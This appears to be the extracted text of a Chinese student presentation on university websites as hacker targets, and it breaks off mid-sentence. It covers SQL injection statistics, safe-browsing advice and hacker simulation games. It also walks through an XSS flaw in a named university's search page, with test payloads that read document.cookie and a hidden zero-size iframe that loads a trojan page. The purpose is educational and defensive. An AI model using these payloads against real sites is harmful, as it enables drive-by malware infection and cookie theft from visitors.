[黑客的练手场.pptVIP

高校网站 ——黑客的“练手场” 李绮萍 邓海英 20111201088 20120009022 一、黑客君的自我介绍 二、黑客对我们做了什么 三、防火防盗防黑客 四、趣闻 一、黑客君的自我介绍 “黑客”一词是由英语Hacker音译出来的，泛指精通各种编程语言和各类操作系统，是擅长IT技术的人群、计算机科学家，伴随着计算机和网络的发展而产生成长。 二、黑客对我们做了什么？ 1、高校网站被入侵 高考结束后，挑学校、选专业成为考生和家长们的首要任务，各大高校网站的浏览量进入高峰期。 高考前后，黑客针对高校网站的攻击行为大幅增多。对于上网检索高校信息的考生和家长来说，如果电脑没有开启安全软件防护，打开被挂马的网页时就会自动下载运行木马，对电脑资料和志愿填报造成严重风险。 2、利用漏洞、篡改信息 下面举个专家检测恶意程序的例子来说明： （1）北京大学网站 　　漏洞原因：搜索查询页面关键字符未过滤 　　漏洞危害：能用来挂马、控制网站 　 　　 漏洞利用： 打开北京大学英文网页，在右边可以看到有一个搜索查询Search，点击“go”按钮，会出现“Please Input Keyword”的提示。再在浏览器中输入： 54/cgi-bin/allsearch_e?word=scriptalert(XSS)/script,看到弹出的话框就说明语句已经执行了。 如果将语句构造成iframe. src=http://www.***.com/muma.htm width=0 height=0 iframe，当访问者打开此链接的时候，就会自动打开挂马的http://www.***.com/muma.htm。将此网站的宽度和高度分别设为0，这样访问者就无法看见打开的挂马网页了。 小提示：判断是否存在跨站漏洞的语句有%3Cscript%3Ealert(XSS)%3C/script%3E、scriptalert(XSS)/script、scriptalert(document.cookie)/script 、=scriptalert(document.cookie)/script 、scriptalert(document.cookie)/script 等。 漏洞修补：在编写网页时，要注意坚决不要相信任何用户输入并过滤所有特殊字符，这样既可消灭绝大部分的XSS攻击。只需要一个简短的Javascript程序即可完成对输入数据的过滤（代码下载地址：/bzsoft）。 三、防火防盗防黑客 1、危害 针对黑客攻击的技术手段，360统计发现，SQL注入攻击是高校网站面临的主要风险，占黑客攻击数量的63%。据介绍，SQL注入攻击是由于网站系统存在漏洞，黑客只要向网站提交SQL查询语句，就可以非法获取网站数据库敏感信息，导致直接上传后门文件，篡改网页内容等一系列严重后果。 2、预防 尽管“反黑”人才众多，但是，道高一尺，魔高一丈，各种恶意攻击总是防不胜防，对于高校网站被入侵的问题，除了学校要加强网络信息安全防护之外，我们也应该养成良好的上网习惯。 （1）安装专门的、可靠的杀毒软件； （2）浏览网站的时候要慎重，如发现有安全警报，应停止浏览，确定其安全性之后才决定是否继续浏览； （3）养成定期检查计算机系统文件的习惯，不要嫌麻烦，其实现在很多杀毒软件都很人性化，查毒杀毒的操作简单方便； （4）保护个人隐私，重要的文件要进行备份和加密； （5）注意网站广告，很多网站广告都有病毒，有时候就是没打算打开，也会不小心点击进去了，关掉之后要注意查毒； （6）下载软件的渠道很多，要注意筛选，最好有一个固定的下载软件的常用知名网站，比较有安全保障。 四、黑客趣闻 1、关于游戏： 黑客是怎样炼成的？ 下面介绍两款经典的黑客模拟游戏。 Uplink （1）Uplink(Windows/Mac/Linux) 一款非常古老的黑客游戏。“Uplink”由Introversion Software在2001年发 布。 在游戏中玩家需要扮演一个神通广大的黑客，在网络上接受各种任务，破解世界各地的电脑系统。 在游戏中，玩家并不需要了解很多专业知识，通过该项游戏，玩家反而能学到不少黑客知识。 Codelink （2）Codelink(Windows/Flash) Codelink也提供有类似Uplink的黑客攻防体验。不过，它